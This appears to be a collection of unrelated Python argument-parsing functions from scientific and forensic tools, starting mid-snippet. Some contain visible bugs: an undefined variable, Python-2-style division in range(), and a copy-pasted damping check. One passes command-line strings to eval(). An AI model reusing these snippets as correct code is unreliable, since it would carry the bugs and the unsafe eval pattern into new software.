direction vectors in\\n'\n ' the \\\"Atoms\\\" section of a LAMMPS data file.\\n')\n ilist = argv[i + 1].split()\n if (len(ilist) % 3) != 0:\n raise InputError('Error(dump2data): ' + argv[i] + ' flag should be followed by list of integers.\\n'\n ' This is usually a list of 3 intebers, but it can contain more.\\n'\n ' The number of cooridnate columns must be divisible by 3,\\n'\n ' (even if the simulation is in 2 dimensions)\\n')\n\n data_settings.ii_vects = []\n for i in range(0, len(ilist) / 3):\n cols = [ilist[3 * i] + 1, ilist[3 * i + 1] +\n 1, ilist[3 * i + 2] + 1]\n setting.ii_vects.append(cols)\n # This should override any earlier settings as a result of the\n # -atomstyle argument. So you can specify a custom list of column\n # names using -atomstyle \"list of column names\", and then afterwards\n # specify which of these columns correspond to direction vectors\n # using the \"-ivect\" command line argument later on.\n # This way, in theory you should be able to read columns from\n # new custom atom-styles that have not been invented yet.\n # (Although I haven't tested this.)\n\n del(argv[i:i + 2])\n # i_atomid is not really needed for this program, but I load it anyway\n elif ((argv[i].lower() == '-iatomid') or\n (argv[i].lower() == '-iid') or\n (argv[i].lower() == '-iatom-id')):\n if ((i + 1 >= len(argv)) or (not str.isdigit(argv[i + 1]))):\n raise InputError('Error(dump2data): ' + argv[i] + ' flag should be followed by an integer\\n'\n ' (>=1) indicating which column in the \\\"Atoms\\\" section of a\\n'\n ' LAMMPS data file contains the atom id number (typically 1).\\n'\n ' (This argument is unnecessary if you use the -atomstyle argument.)\\n')\n i_atomid = int(argv[i + 1]) - 1\n del(argv[i:i + 2])\n # i_atomtype is not really needed for this program, but I load it\n # anyway\n elif ((argv[i].lower() == '-iatomtype') or\n (argv[i].lower() == '-itype') or\n (argv[i].lower() == '-iatom-type')):\n if ((i + 1 >= len(argv)) or (not str.isdigit(argv[i + 1]))):\n raise InputError('Error(dump2data): ' + argv[i] + ' flag should be followed by an integer\\n'\n ' (>=1) indicating which column in the \\\"Atoms\\\" section of a\\n'\n ' LAMMPS data file contains the atom type.\\n'\n ' (This argument is unnecessary if you use the -atomstyle argument.)\\n')\n i_atomtype = int(argv[i + 1]) - 1\n del(argv[i:i + 2])\n # i_molid is not really needed for this program, but I load it anyway\n elif ((argv[i].lower() == '-imolid') or\n (argv[i].lower() == '-imol') or\n (argv[i].lower() == '-imol-id') or\n (argv[i].lower() == '-imoleculeid') or\n (argv[i].lower() == '-imolecule-id')):\n if ((i + 1 >= len(argv)) or (not str.isdigit(argv[i + 1]))):\n raise InputError('Error(dump2data): ' + argv[i] + ' flag should be followed by an integer\\n'\n ' (>=1) indicating which column in the \\\"Atoms\\\" section of a\\n'\n ' LAMMPS data file contains the molecule id number.\\n'\n ' (This argument is unnecessary if you use the -atomstyle argument.)\\n')\n del(argv[i:i + 2])\n # Which snapshot do we want?\n elif (argv[i].lower() == '-t'):\n if ((i + 1 >= len(argv)) or (not str.isdigit(argv[i + 1]))):\n raise InputError('Error(dump2data): ' + argv[i] + ' flag should be followed by an integer indicating\\n'\n ' the snapshot you want to extract from the dump file (trajectory).\\n'\n ' This integer should match the timestep corresponding to the snapshot\\n'\n ' whose coordinates you wish to extract.\\n')\n misc_settings.timestep_str = argv[i + 1]\n del(argv[i:i + 2])\n misc_settings.multi = False\n misc_settings.last_snapshot = False\n\n elif (argv[i].lower() == '-tstart'):\n if ((i + 1 >= len(argv)) or (not str.isdigit(argv[i + 1]))):\n raise InputError('Error(dump2data): ' + argv[i] + ' flag should be followed by an integer indicating\\n'\n ' the first snapshot you want to extract from the dump file (trajectory).\\n'\n ' This integer should match the timestep corresponding to the snapshot\\n'\n ' (after which) you wish to extract coordinates.\\n')\n misc_settings.tstart = float(argv[i + 1])\n del(argv[i:i + 2])\n misc_settings.multi = True\n\n elif (argv[i].lower() == '-tstop'):\n if ((i + 1 >= len(argv)) or (not str.isdigit(argv[i + 1]))):\n raise InputError('Error(dump2data): ' + argv[i] + ' flag should be followed by an number indicating\\n'\n ' the first snapshot you want to extract from the dump file (trajectory).\\n'\n ' Snapshots after this timestep will be ignored.\\n')\n misc_settings.tstop = float(argv[i + 1])\n del(argv[i:i + 2])\n misc_settings.multi = True\n\n elif (argv[i].lower() == '-center'):\n misc_settings.center_snapshot = True\n del(argv[i:i + 1])\n\n elif ((argv[i].lower() == '-raw') or (argv[i].lower() == '-rawout')):\n misc_settings.output_format = 'raw'\n del(argv[i:i + 1])\n\n elif (argv[i].lower() == '-rawin'):\n misc_settings.input_format = 'raw'\n misc_settings.multi = False\n del(argv[i:i + 1])\n\n elif ((argv[i].lower() == '-xyz') or\n (argv[i].lower() == '-xyz-type') or\n (argv[i].lower() == '-xyzout')):\n misc_settings.output_format = 'xyz'\n del(argv[i:i + 1])\n\n elif (argv[i].lower() == '-xyz-id'):\n misc_settings.output_format = 'xyz-id'\n del(argv[i:i + 1])\n\n elif (argv[i].lower() == '-xyz-mol'):\n misc_settings.output_format = 'xyz-mol'\n del(argv[i:i + 1])\n\n elif (argv[i].lower() == '-xyz-type-mol'):\n misc_settings.output_format = 'xyz-type-mol'\n del(argv[i:i + 1])\n\n elif (argv[i].lower() == '-xyzin'):\n misc_settings.input_format = 'xyz'\n misc_settings.multi = False\n del(argv[i:i + 1])\n\n elif (argv[i].lower() == '-multi'):\n misc_settings.multi = True\n del(argv[i:i + 1])\n\n elif (argv[i].lower() == '-last'):\n misc_settings.last_snapshot = True\n misc_settings.multi = False\n del(argv[i:i + 1])\n\n elif (argv[i].lower() == '-interval'):\n misc_settings.skip_interval = int(argv[i + 1])\n del(argv[i:i + 2])\n\n elif (argv[i].lower() == '-scale'):\n misc_settings.scale = float(argv[i + 1])\n del(argv[i:i + 2])\n\n elif (argv[i].lower() == '-id'):\n misc_settings.atom_id_intervals += Str2IntervalUnion(argv[i+1])\n del(argv[i:i + 2])\n\n elif (argv[i].lower() == '-type'):\n misc_settings.atom_type_intervals += Str2IntervalUnion(argv[i+1])\n del(argv[i:i + 2])\n\n elif (argv[i].lower() == '-mol'):\n misc_settings.mol_id_intervals += Str2IntervalUnion(argv[i+1])\n del(argv[i:i + 2])\n\n elif ((argv[i].lower() == '-in') or\n (argv[i].lower() == '-dump')):\n misc_settings.in_coord_file_name = argv[i+1]\n del(argv[i:i + 2])\n\n elif ((argv[i][0] == '-') and (__name__ == \"__main__\")):\n raise InputError(\n 'Error(dump2data): Unrecogized command line argument \\\"' + argv[i] + '\\\"\\n')\n else:\n i += 1\n\n usage_examples = \\\n\"\"\" Typical usage:\ndump2data.py orig_file.data < dump.lammpstrj > new_file.data\n (This extracts last snapshot, uses \"full\" atom_style.)\n Additional options:\ndump2data.py -t t -atomstyle style orig.data < dump.lammpstrj > new.data\n\"\"\"\n\n # if __name__ == \"__main__\":\n\n if (len(argv) > 2):\n # if there are more than 2 remaining arguments,\n # AND\n # no other function will process the remaining argument list\n # (ie. if __name__ == \"__main__\")\n # THEN\n raise InputError(' ----\\n'\n 'ERROR(dump2data): You have too many arguments (or unrecognized arguments):\\n'\n ' \\\"' + (' '.join(argv)) + '\\\"\\n'\n ' ----\\n'\n + usage_examples)\n elif (len(argv) < 2):\n if misc_settings.output_format == 'data':\n raise InputError(' ----\\n'\n 'ERROR(dump2data): Problem with argument list:\\n'\n ' Expected a LAMMPS .data file as an argument.\\n'\n ' ----\\n'\n + usage_examples)\n else:\n in_data_file = open(argv[1], 'r')\n data_settings.file_name = argv[1]\n data_settings.contents = in_data_file.readlines()\n in_data_file.close()\n\n # end of if-then statement for \"if __name__ == \"__main__\"\"\n\n if len(data_settings.i_coords) == 0:\n if warning_strings != None:\n warning_strings.append(\n 'WARNING(dump2data): atom_style unknown. (Use -atomstyle style. Assuming \\\"full\\\")')\n warn_atom_style_unspecified = True\n # The default atom_style is \"full\"\n data_settings.column_names = AtomStyle2ColNames('full')\n ii_coords = ColNames2Coords(data_settings.column_names)\n # This program assumes that there is only one coordinate triplet\n # (x,y,z) for each atom. Hence we assume that len(ii_coords)==1\n assert(len(ii_coords) == 1)\n data_settings.i_coords = ii_coords[0]\n data_settings.ii_vects = ColNames2Vects(data_settings.column_names)\n data_settings.i_atomid, data_settings.i_atomtype, data_settings.i_molid = ColNames2AidAtypeMolid(\n data_settings.column_names)\n\n # sys.stderr.write('########################################################\\n'\n # '## WARNING: atom_style unspecified ##\\n'\n # '## --> \\\"Atoms\\\" column data has an unknown format. ##\\n'\n # '## Assuming atom_style = \\\"full\\\" ##\\n'\n # '########################################################\\n'\n # '## To specify the \\\"Atoms\\\" column format you can: ##\\n'\n # '## 1) Use the -atom_style \\\"STYLE\\\" argument ##\\n'\n # '## where \\\"STYLE\\\" is a string indicating a LAMMPS ##\\n'\n # '## atom_style, including hybrid styles.(Standard ##\\n'\n # '## atom styles defined in 2011 are supported.) ##\\n'\n # '## 2) Use the -atom_style \\\"COL_LIST\\\" argument ##\\n'\n # '## where \\\"COL_LIST\" is a quoted list of strings ##\\n'\n # '## indicating the name of each column. ##\\n'\n # '## Names \\\"x\\\",\\\"y\\\",\\\"z\\\" are interpreted as ##\\n'\n # '## atomic coordinates. \\\"mux\\\",\\\"muy\\\",\\\"muz\\\" ##\\n'\n # '## and \\\"quati\\\",\\\"quatj\\\",\\\"quatk\\\" are ##\\n'\n # '## interpreted as direction vectors. ##\\n'\n # '## 3) Use the -icoord \\\"cx cy cz...\\\" argument ##\\n'\n # '## where \\\"cx cy cz\\\" is a list of integers ##\\n'\n # '## indicating the column numbers for the x,y,z ##\\n'\n # '## coordinates of each atom. ##\\n'\n # '## 4) Use the -ivect \\\"cmux cmuy cmuz...\\\" argument ##\\n'\n # '## where \\\"cmux cmuy cmuz...\\\" is a list of ##\\n'\n # '## integers indicating the column numbers for ##\\n'\n # '## the vector that determines the direction of a ##\\n'\n # '## dipole or ellipsoid (ie. a rotateable vector).##\\n'\n # '## (More than one triplet can be specified. The ##\\n'\n # '## number of entries must be divisible by 3.) ##\\n'\n # '## 5) Include a ##\\n'\n # '## write(\\\"in_init.txt\\\"){atom_style ...} ##\\n'\n # '## statement in your .ttree file. ##\\n'\n # '########################################################\\n')", "def parse_cmd_args(self, args):\n\t\tfor k, v in vars(args).items():\n\t\t\tif k == \"cfg\":\n\t\t\t\tcontinue\t\t\t\t# reserved keyword (for loading settings)\n\n\t\t\tif v is None:\n\t\t\t\tcontinue\t\t\t\t# None stands for not set\n\n\t\t\tif not hasattr(self, k):\n\t\t\t\traise RuntimeError(\"[ERROR] Not recognized argument from comamnd line: {}.\".format(k))\n\t\t\tsetattr(self, k, v)", "def _parse_arguments(self, argv):\n parser = argparse.ArgumentParser()\n for section in self.config.sections():\n for key in self.config[section]:\n arg_name = '--' + key.replace(' ', '_').lower()\n parser.add_argument(arg_name)\n override_kwargs = vars(parser.parse_args(argv))\n override_kwargs = {k: v for k,\n v in override_kwargs.items() if v is not None}\n self._overwrite_with_kwargs(**override_kwargs)", "def parse_command_line_arguments(command_line_arguments):\n # First determine if a we're loading from a file\n filename = False\n if \"--file\" in command_line_arguments:\n index = command_line_arguments.index(\"--file\")+1\n filename = command_line_arguments[index]\n if output.tracking_suffix in filename:\n # Assumes simulation in progress. So, if final_sweep ==\n # current_sweep, the simulation will load and then\n # immediately end.\n return get_progress_file_info(filename)\n if not (output.output_suffix in filename):\n raise ValueError(\"Can only load from *.boundaryprg2p1 or \"\n +\"*.boundary2p1 files!\")\n # If filename is of type *.boundary2p1, we assume its okay and\n # load from it. None of the other command line arguments\n # change.\n\n if \"--select\" in command_line_arguments:\n index = command_line_arguments.index(\"--select\")+1\n if command_line_arguments[index] == \"std\":\n algorithm = monte_carlo.select_for_curvature\n elif command_line_arguments[index] == \"area\":\n algorithm = monte_carlo.select_for_area\n else:\n algorithm = default_algorithm\n else:\n algorithm = default_algorithm \n\n if \"--target-area\" in command_line_arguments:\n index = command_line_arguments.index(\"--target-area\")+1\n target_area = int(eval(command_line_arguments[index]))\n else:\n target_area = int(eval(command_line_arguments[0]))\n\n if \"--target-std\" in command_line_arguments:\n index = command_line_arguments.index(\"--target-std\")+1\n target_std = float(eval(command_line_arguments[index]))\n else:\n target_std = default_target_std\n\n if \"--area-damping\" in command_line_arguments:\n index = command_line_arguments.index(\"--area-damping\")+1\n area_damping_strength = float(eval(command_line_arguments[index]))\n else:\n area_damping_strength = default_area_damping\n if not 0 <= area_damping_strength <= 1:\n raise ValueError(\"Damping must be between 0 and 1.\")\n\n if \"--std-damping\" in command_line_arguments:\n index = command_line_arguments.index(\"--std-damping\")+1\n std_damping_strength = float(eval(command_line_arguments[index]))\n else:\n std_damping_strength = default_std_damping\n if not 0 <= area_damping_strength <= 1:\n raise ValueError(\"Damping must be between 0 and 1.\")\n\n if \"--initial\" in command_line_arguments:\n index = command_line_arguments.index(\"--initial\")+1\n initial_sweep = int(eval(command_line_arguments[index]))\n else:\n initial_sweep = default_initial_sweep\n\n if \"--final\" in command_line_arguments:\n index = command_line_arguments.index(\"--final\")+1\n final_sweep = int(eval(command_line_arguments[index]))\n else:\n final_sweep = default_final_sweep\n\n if \"--save\" in command_line_arguments:\n index = command_line_arguments.index(\"--save\")+1\n save_every_n_sweeps = int(eval(command_line_arguments[index]))\n else:\n save_every_n_sweeps = default_save_every_n_sweeps\n if save_every_n_sweeps < 1:\n raise ValueError(\"You must save at least every 1 sweeps!\")\n\n if \"--v5\" in command_line_arguments:\n index = command_line_arguments.index(\"--v5\")+1\n v5damping = int(eval(command_line_arguments[index]))\n else:\n v5damping = target_area/10\n\n if \"--v6\" in command_line_arguments:\n index = command_line_arguments.index(\"--v6\")+1\n v6damping = int(eval(command_line_arguments[index]))\n else:\n v6damping = target_area/10\n \n if \"--many\" in command_line_arguments:\n if \"--one\" in command_line_arguments or \"--exact\" in command_line_arguments:\n raise ValueError(\"Contradictory input!\")\n if \"--micro\" in command_line_arguments:\n gather_data_function = output.save_many_microscopically_optimal\n else:\n gather_data_function = output.gather_data_to_n_files\n elif \"--one\" in command_line_arguments:\n if \"--many\" in command_line_arguments or \"--exact\" in command_line_arguments:\n raise ValueError(\"Condtradictory input!\")\n if \"--micro\" in command_line_arguments:\n gather_data_function = output.stop_at_microscopically_optimal\n else:\n gather_data_function = output.gather_data_to_1_file\n elif \"--exact\" in command_line_arguments:\n if \"--many\" in command_line_arguments or \"--one\" in command_line_arguments:\n raise ValueError(\"Contradictory input!\")\n gather_data_function = output.generate_n_exact_spheres\n index = command_line_arguments.index(\"--exact\")+1\n # In this case, v5damping is fitness_damping, as defined\n # in generate_n_exact_spheres\n v5damping = int(eval(command_line_arguments[index]))\n else:\n if \"--micro\" in command_line_arguments:\n gather_data_function = output.stop_at_microscopically_optimal\n else:\n gather_data_function = output.gather_data_to_1_file\n\n # return a class with all the info we need\n params = parameters(filename, target_area, area_damping_strength,\n target_std, std_damping_strength,\n initial_sweep, final_sweep,\n save_every_n_sweeps,\n v5damping, v6damping,\n algorithm,\n gather_data_function)\n return params", "def parse_args(self, args):\n raise Exception(\"Not implemented\")", "def __parse_args(self):\n _method_name = '__parse_args'\n\n if self.__raw_args is not None and len(self.__raw_args) > 0:\n if isinstance(self.__raw_args, list):\n arguments = self.__raw_args\n else:\n arguments = self.__raw_args.split()\n\n for argument in arguments:\n if self.__client_server_regex.match(argument):\n self.__client_server_args.append(argument)\n elif self.__x_args_size_regex.match(argument):\n self.__process_x_size_arg(argument)\n elif self.__x_args_value_regex.match(argument):\n self.__process_x_value_arg(argument)\n elif self.__x_args_other_regex.match(argument):\n self.__process_x_other_arg(argument)\n elif self.__xx_args_switch_regex.match(argument):\n self.__process_xx_switch_arg(argument)\n elif self.__xx_args_value_regex.match(argument):\n self.__process_xx_value_arg(argument)\n elif self.__sys_props_regex.match(argument):\n self.__process_sys_prop_arg(argument)\n else:\n self._logger.finer('WLSDPLY-08300', argument, class_name=self._class_name, method_name=_method_name)\n self.__unsorted_args.append(argument)", "def _parse_args():\n parser = argparse.ArgumentParser(description='main.py')\n \n # General system running and configuration options\n parser.add_argument('--do_nearest_neighbor', dest='do_nearest_neighbor', default=False, action='store_true', help='run the nearest neighbor model')\n\n parser.add_argument('--train_path', type=str, default='data/geo_train.tsv', help='path to train data')\n parser.add_argument('--dev_path', type=str, default='data/geo_dev.tsv', help='path to dev data')\n parser.add_argument('--test_path', type=str, default='data/geo_test.tsv', help='path to blind test data')\n parser.add_argument('--test_output_path', type=str, default='geo_test_output.tsv', help='path to write blind test results')\n parser.add_argument('--domain', type=str, default='geo', help='domain (geo for geoquery)')\n \n # Some common arguments for your convenience\n parser.add_argument('--seed', type=int, default=0, help='RNG seed (default = 0)')\n parser.add_argument('--epochs', type=int, default=100, help='num epochs to train for')\n parser.add_argument('--lr', type=float, default=.001)\n parser.add_argument('--batch_size', type=int, default=2, help='batch size')\n # 65 is all you need for GeoQuery\n parser.add_argument('--decoder_len_limit', type=int, default=65, help='output length limit of the decoder')\n\n # Feel free to add other hyperparameters for your input dimension, etc. to control your network\n # 50-200 might be a good range to start with for embedding and LSTM sizes\n args = parser.parse_args()\n return args", "def ParseCommandLineArgs():\n\n theParameterManager = ParameterManager() \n \n # set input options\n parser = argparse.ArgumentParser(description='Command line input.')\n parser.add_argument(\"-i\",\"--input\",action=\"store\", help = \"Load XML input file\")\n parser.add_argument(\"-p\",\"--param\",action=\"append\", help = \"Add user-defined parameter\")\n \n rv = parser.parse_args()\n \n # strip out params\n if (rv.param):\n for param in rv.param:\n splt = string.split(param,\"=\",1)\n if (len(splt) < 2 ): \n raise BluecapError(\"Error: Input parameters should be in the form -p key=value \")\n name = splt[0].strip()\n paramString = splt[1]\n theParameterManager.SetParameter(name,paramString)\n \n \n # sanity checks\n if (not rv.input):\n print(\"Warning - failed to provide input file\")\n #raise IFDError(\"Input error\",\"Failed to provided input file\")\n \n \n return rv", "def parse_args(self, argv):\n\t\tself.argv={'user': argv[1]}", "def parse_args():\n sentinel_dict = {}\n\n def _preprocess_sysargv(argv):\n inputs = []\n for arg in argv[1:]:\n # handles case where values contain --, otherwise they will\n # be interpreted as arguments.\n if '--,' in arg or ',--' in arg or arg == '--':\n sentinel = uuid4().hex\n key = '%s' % sentinel\n sentinel_dict[key] = arg\n inputs.append(sentinel)\n else:\n inputs.append(arg)\n return inputs\n\n def _postprocess_sysargv(v):\n if v in sentinel_dict:\n return sentinel_dict.get(v)\n else:\n return v\n\n #----- read input arguments\n for i, arg in enumerate(sys.argv):\n if (arg[0] == '-') and arg[1].isdigit(): sys.argv[i] = ' ' + arg\n parser = argparse.ArgumentParser()\n\n parser.add_argument('-u', action='store_true', dest='helpmenu',help='extended HELP MENU with examples')\n parser.add_argument('-i','--infile',action='store', dest='infile',help='name of file with SAC or mseed file(s)')\n parser.add_argument('-g','--gain',action='store', dest='sensitivity',help='Stage 0 sensitivity')\n parser.add_argument('-N','--net', action='store', dest='network',help='network')\n parser.add_argument('-S','--sta', action='store', dest='station',help='station')\n parser.add_argument('-C','--cha', action='store', dest='chantype',help='chantype')\n parser.add_argument('-s','--start', action='store', dest='startstring',help='start time YYYY-MM-DDTHH:MM:SS')\n parser.add_argument('-e','--end', action='store', dest='endstring',help='end time YYYY-MM-DDTHH:MM:SS')\n parser.add_argument('-d','--duration', action='store', dest='durationinhours',help='duration in hours')\n parser.add_argument('-dc','--dc','--datacenter', action='store', dest='datacenter',default='IRIS',help='FDSN data center (e.g. IRIS, SCEDC, NCEDC)')\n parser.add_argument('-p','--plot',action='store_true',dest='iplot',help='make plots of each hourly trace (NOTE: can be slow)')\n\n helpextended = parser.parse_args(_preprocess_sysargv(sys.argv)).helpmenu\n if ( helpextended is True ):\n print ('')\n print ('portable_pip_squeak: assess a station either using local data or to be downloaded')\n print ('')\n print ('Usage: portable_pip_squeak.py [options]')\n print ('')\n print ('EXAMPLES:')\n print ('portable_pip_squeak.py --infile my_SAC_files.txt')\n print ('portable_pip_squeak.py -N UW -S TKEY -C HH -s 2018-01-01T00:00:00 -d 2 -p')\n print ('portable_pip_squeak.py -N CI -S LEO -C HN -s 2020-01-01T00:00:00 -d 24 -dc SCEDC')\n print ('')\n print ('Inputs if supplying your own data:')\n print (' -i, --infile Name of text file with SAC/mseed file(s) of 3 (Z,N,E) traces.')\n print (' -g, --gain Gain or Stage 0 sensitivity')\n print (' ')\n print ('Inputs if downloading data:')\n print (' -s, --starttime Trace start time (YYYY-MM-DD,HH:MM:SS)')\n print ('')\n print (' One of these:')\n print (' -e, --endtime Trace end time (YYYY-MM-DD,HH:MM:SS)')\n print (' -d, --duration Duration in hours from starttime')\n print (' Note: if duration is neg, starttime becomes endtime')\n print (' N, S, C and a datacenter if other than IRIS')\n print (' -N, --net Network code')\n print (' -S, --sta Station code')\n print (' -C, --cha Channel type, e.g. EN or HH')\n print (' -dc, --datacenter Name of FDSN data center if not IRIS, e.g. SCEDC, NCEDC')\n print (' ')\n print ('Optional flags:')\n print ('-P, --plot Flag to make a figure for each hour. Note: can be slow.')\n print ('-u Print this extended help menu')\n print ('')\n\n\n return parser.parse_args(_preprocess_sysargv(sys.argv))", "def parse_args(self):\n return self.__process_args__(self.parser.parse_args())", "def parseArguments(self):\n iterator = iter(sys.argv[1:]) # Skip file name\n for argument in iterator:\n if len(argument) < 2 or argument[:2] != '--':\n self.error('syntax error \"{}\"'.format(argument))\n else:\n def getValueOfArgument(): return next(iterator)\n self.parseArgument(argument[2:], getValueOfArgument)", "def _configure_args(self, parser: ArgumentParser) -> ArgumentParser:\n pass", "def main_parse_args():\n parser = ArgumentParser()\n parser = cf.add_config_args(parser)\n args = parser.parse_args()\n config_opts = sys.argv[1:]\n # add working_dir to config_opts\n found_wd = False\n for opt in ['-wd', '--working_dir']:\n if opt in config_opts:\n found_wd = True\n if not found_wd:\n config_opts.extend(['-wd', args.working_dir])\n # remove src_classes from config_opts\n for opt in ['-srcs', '--src_classes']:\n if opt in config_opts:\n idx = config_opts.index(opt)\n config_opts.pop(idx)\n # pop next item\n config_opts.pop(idx)\n args.config_opts = \" \".join(config_opts)\n return args", "def parseArguments():\n parser = argparse.ArgumentParser(description=\"AutoMacTC: an Automated macOS forensic triage collection framework.\", add_help=False)\n\n module_filter = parser.add_argument_group('module filter')\n mods = module_filter.add_mutually_exclusive_group(required=False)\n mods.add_argument('-m', '--include_modules', type=str, nargs='+', help='module(s) to use, use \"all\" to run all modules, space separated list only', default=[''], required=False)\n mods.add_argument('-x', '--exclude_modules', type=str, nargs='+', help='assumes you want to run all modules EXCEPT those specified here, space separated list only', default=[''], required=False)\n mods.add_argument('-l', '--list_modules', help='if flag is provided, will list available modules and exit.', default=False, action='store_true', required=False)\n\n general = parser.add_argument_group('general arguments')\n general.add_argument(\"-h\", \"--help\", action=\"help\", help=\"show this help message and exit\")\n general.add_argument(\"-v\", \"--verbose\", default=False, action='store_true', help=\"enable verbose logging\")\n general.add_argument('-i', '--inputdir', default='/', help='input directory; mount dmg with mountdmg.sh script and use -f to analyze mounted HFS or APFS Volume, use volume appended with \"Data\" (e.g. \"Macintosh HD - Data\") for 10.15+ systems', required=False)\n general.add_argument('-is', '--inputsysdir', default='', help='input system drive if using mounted drive from 10.15+ system (e.g. \"Macintosh HD\")', required=False)\n general.add_argument('-o', '--outputdir', default='./', help='output directory', required=False)\n general.add_argument('-p', '--prefix', help='prefix to append to tarball and/or output files', default='automactc-output', required=False)\n general.add_argument('-f', '--forensic_mode', help='if flag is provided, will analyze mounted volume provided as inputdir', default=False, action='store_true', required=False)\n general.add_argument('-nt', '--no_tarball', help='if flag is provided, will NOT package output files into tarball', default=False, action='store_true', required=False)\n general.add_argument('-nl', '--no_logfile', help='if flag is provided, will NOT generate logfile on disk', default=False, action='store_true', required=False)\n general.add_argument('-fmt', '--output_format', help='toggle between csv and json output, defaults to csv', default='csv', action='store', required=False, choices=['csv', 'json'])\n general.add_argument('-np', '--no_low_priority', help='if flag is provided, will NOT run automactc with highest niceness (lowest CPU priority). high niceness is default', default=False, action='store_true', required=False)\n general.add_argument('-b', '--multiprocessing', help='if flag is provided, WILL multiprocess modules [WARNING: Experimental!]', default=False, action='store_true', required=False)\n general.add_argument('-O', '--override_mount', help='if flag is provided, WILL bypass error where inputdir does not contain expected subdirs', default=False, action='store_true', required=False)\n\n console_log_args = parser.add_argument_group('console logging verbosity')\n console_logging_args = console_log_args.add_mutually_exclusive_group(required=False)\n console_logging_args.add_argument('-q', '--quiet', help='if flag is provided, will NOT output to console at all', default=False, action='store_true', required=False)\n console_logging_args.add_argument('-r', '--rtr', help='reduce verbosity to display nicely on RTR console', default=False, action='store_true', required=False)\n console_logging_args.add_argument('-d', '--debug', help='enable debug logging to console', default=False, action='store_true', required=False)\n\n dirlist_args = parser.add_argument_group('specific module arguments')\n dirlist_args.add_argument('-K', '--dir_include_dirs', type=str, nargs='+', help='directory inclusion filter for dirlist module, defaults to volume root, space separated list only', default=[''], required=False)\n dirlist_args.add_argument('-E', '--dir_exclude_dirs', type=str, nargs='+', help='directory and file exclusion filter for dirlist module. defaults are specified in README. space separated list only. \\\n put \\'no-defaults\\' as first item to overwrite default exclusions and then provide your own exclusions', default=[''], required=False)\n dirlist_args.add_argument('-H', '--dir_hash_alg', nargs='+', help='either sha256 or md5 or both or none, at least one is recommended, defaults to sha256. also applies to autoruns module', default='sha256', required=False)\n dirlist_args.add_argument('-S', '--dir_hash_size_limit', type=int, help='file size filter for which files to hash, in megabytes, defaults to 10MB. also applies to autoruns module', default=10, required=False)\n dirlist_args.add_argument('-R', '--dir_recurse_bundles', help='will fully recurse app bundles if flag is provided. this takes much more time and space', default=False, action='store_true', required=False)\n dirlist_args.add_argument('-NC', '--dir_no_code_signatures', help='if flag is provided, will NOT check code signatures for app and kext files. also applies to autoruns module', default=False, action='store_true', required=False)\n dirlist_args.add_argument('-NM', '--dir_no_multithreading', help='if flag is provided, will NOT multithread the dirlist module', default=False, action='store_true', required=False)\n args = parser.parse_args()\n\n return args", "def parse_cmd_arguments():\n parser = argparse.ArgumentParser(description='Process some integers.')\n parser.add_argument('-i', '--input', required=True, help='input JSON file')\n parser.add_argument('-o', '--output', required=True,\n help='ouput JSON file')\n parser.add_argument('-d', '--debug', required=False,\n help='log level. Can be 0-3. Defaults to 0')\n\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n '--src',\n help='path to update file',\n required=True)\n\n parser.add_argument(\n '--dst',\n help='working directory',\n required=True)\n\n parser.add_argument(\n '--disable_rollback',\n help='disable rollabck in case of errors',\n action='store_false')\n\n return parser.parse_args()", "def parse_command_line(self, argv):\n from optparse import OptionParser\n usage = \"usage: %prog [options]\"\n parser = OptionParser(usage)\n\n (options, args) = parser.parse_args(argv)", "def parseCommandLine_(self):\n\n self.ensureNotCreated()\n\n import sys\n\n parseCommandLine = False\n for argv in sys.argv:\n if 'globalTag' in argv or 'era' in argv or 'process' in argv:\n parseCommandLine = True\n break\n\n if parseCommandLine:\n from FWCore.ParameterSet.VarParsing import VarParsing\n options = VarParsing()\n options.register('globalTag',\n '',\n VarParsing.multiplicity.singleton,\n VarParsing.varType.string,\n 'The globaltag to use')\n\n options.register('era',\n '',\n VarParsing.multiplicity.singleton,\n VarParsing.varType.string,\n 'Era of the dataset')\n\n options.register('process',\n '',\n VarParsing.multiplicity.singleton,\n VarParsing.varType.string,\n 'Process name of the MiniAOD production.')\n\n options.parseArguments()\n\n if options.globalTag:\n self.globalTag = options.globalTag\n\n if options.era:\n assert options.era == '25ns' or options.era == '50ns'\n if options.era == '25ns':\n self.era = eras.Run2_25ns\n else:\n self.era = eras.Run2_50ns\n\n if options.process:\n self.processName = options.process", "def parse_args(args):\n\n parser = argparse.ArgumentParser(\n description=\"\"\"Generates and runs an afni_proc.py script to preprocess resting state fMRI data\"\"\",\n formatter_class=argparse.RawDescriptionHelpFormatter)\n\n # Optional Flags\n parser.add_argument(\"-t\", \"--trs_remove\", action=\"store\", default=5, type=int, metavar='TRs',\n help=\"\"\"number of trs to remove at the beginning of the epi data\n (default = 5 trs)\"\"\")\n parser.add_argument(\"-d\", \"--dim_voxel\", action=\"store\", default=2.0, type=float, metavar='MM',\n help=\"voxel dimensions in mm that processed epi will be resampled to (default = 2.0 mm)\")\n parser.add_argument(\"-b\", \"--bandpass\", action=\"store\", default=[0.01, 0.25], nargs=2, type=float, metavar=\"F\",\n help=\"bandpass frequencies lower and upper limits (default = 0.01 0.25)\")\n parser.add_argument(\"-v\", \"--volumes\", action=\"store\", default=0, type=int, metavar=\"V\",\n help=\"\"\"truncate the epi data to the inputted number of volumes, useful if subjects have data \n with different numbers of volumes (default = no truncation)\"\"\")\n parser.add_argument(\"-f\", \"--fwhm\", action=\"store\", default=5.0, type=float, metavar=\"MM\",\n help=\"the full width half maximum that is used when blurring (default = 5.0 mm)\")\n parser.add_argument(\"-c\", \"--cores\", action=\"store\", default=cpu_count(), type=int, metavar=\"C\",\n help=\"number of cores supplied to 3dDeconvolve (default = all cores)\")\n parser.add_argument(\"-s\", \"--subj_id\", action=\"store\", default=\"sub\", metavar=\"SUB\",\n help=\"text file of subject ids (default = sub)\")\n parser.add_argument(\"-T\", \"--time_step\", action=\"store\", default=0, type=float, metavar=\"TS\",\n help=\"set the time step for bandpassing (default = ts in header info\")\n\n parser.add_argument(\"-g\", \"--global_signal_regression\", action=\"store_false\", default=True,\n help=\"do not perform global signal regression (default = perform gsr)\")\n\n parser.add_argument(\"-r\", \"--rerun\", action=\"store_true\", default=False,\n help=\"\"\"rerun preprocessing, override and delete previous results in \n 'Processed' folder (default = don't override)\"\"\")\n parser.add_argument(\"-m\", \"--motion_param\", action=\"store_true\", default=False,\n help=\"use 12 motion parameters for regression (default = 6 motion parameters)\")\n parser.add_argument(\"-G\", \"--gm_blur\", action=\"store_true\", default=False,\n help=\"blur only in grey matter mask (default = blur in whole 